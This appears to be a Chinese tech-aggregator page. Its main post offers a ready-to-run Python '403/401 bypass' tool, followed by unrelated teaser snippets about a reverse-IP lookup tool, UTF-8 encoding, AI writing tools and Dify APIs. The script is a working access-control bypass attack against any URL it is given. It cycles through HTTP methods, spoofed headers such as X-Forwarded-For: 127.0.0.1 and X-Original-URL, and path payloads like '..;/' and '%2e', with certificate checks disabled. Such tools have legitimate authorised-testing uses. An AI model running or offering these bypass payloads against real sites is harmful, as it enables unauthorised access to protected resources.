news 2026/2/14 21:04:24

一款自动化的403/401绕过测试工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
一款自动化的403/401绕过测试工具

工具介绍

一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。

工具使用

python run.py -u http://xx.com

run.py

import requests import argparse import urllib3 from urllib.parse import urlparse # 忽略 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BypassScanner: def __init__(self, target_url): self.target = target_url.rstrip('/') self.path = urlparse(target_url).path self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0" } def scan(self): print(f"[*] Starting Bypass Scan for: {self.target}\n") # 1. 谓词篡改 (Verb Tampering) methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"] for m in methods: self._request(m, self.target, title=f"Method: {m}") # 2. Header 注入 bypass_headers = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Original-URL": self.path}, {"X-Rewrite-URL": self.path}, {"X-Remote-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"} ] for h in bypass_headers: self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}") # 3. 路径变形 (Path Fuzzing) # 包含你提到的 ..;/ 和 ../ path_payloads = [ f"{self.target}/", f"{self.target}/.", f"{self.target}..;/", f"{self.target}/..;/", f"{self.target}/%2e/", f"{self.target}//", f"{self.target}.json" ] for p in path_payloads: self._request("GET", p, title=f"Path: {p.replace(self.target, '')}") def _request(self, method, url, headers=None, title=""): test_headers = self.headers.copy() if headers: test_headers.update(headers) try: resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False) color = "\033[92m" if resp.status_code == 200 else "\033[90m" print(f"{color}[{resp.status_code}] {title} \033[0m") except Exception as e: print(f"[!] Error on {title}: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)") args = parser.parse_args() scanner = BypassScanner(args.url) scanner.scan()

工具下载

https://github.com/Adonis-363/403-
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/9 23:27:54

IP反查工具,能够快速查询指定IP/域名关联的所有网站

工具介绍 ReverseIP-CN 是一款专为中文网络环境优化的IP反查工具,能够快速查询指定IP/域名关联的所有网站,是网络安全检测、资产梳理的利器。工具使用 依赖包安装: pip install -r requirements.txt参数说明: 参数 全称 说明-u --…

作者头像 李华
网站建设 2026/2/5 17:29:27

消除乱码-UTF8字符转换

编码格式是多样的,既繁华又让人迷惑。针对IUP和GTK而言,正确显示汉字的方法:1. IUP,设置其本身使用 UTF8,然后外部调用时给它UTF8字符;2. GTK,内部使用的是UTF8,直接送UTF8字符给它即…

作者头像 李华
网站建设 2026/2/7 11:21:17

2026必备!继续教育TOP9AI论文写作软件测评与推荐

2026必备!继续教育TOP9AI论文写作软件测评与推荐 2026年继续教育AI论文写作工具测评:精准筛选,高效助力学术创作 随着人工智能技术的不断进步,AI论文写作工具在继续教育领域的应用愈发广泛。对于需要撰写论文、发表研究成果的学员…

作者头像 李华
网站建设 2026/2/14 1:19:57

dify制作的工作流如何通过API调用

大家在基于dify开发Workflow和Agent,一般都是通过dify提供app功能直接提供使用,或者通过嵌入到其他页面中使用,但是还有一种情况,特别是针对各种数据处理的Workflow,需要通过程序调用,返回数据供其他app使用。该如何做呢?本文主要基于dify,将通过工作流发布的API,通过…

作者头像 李华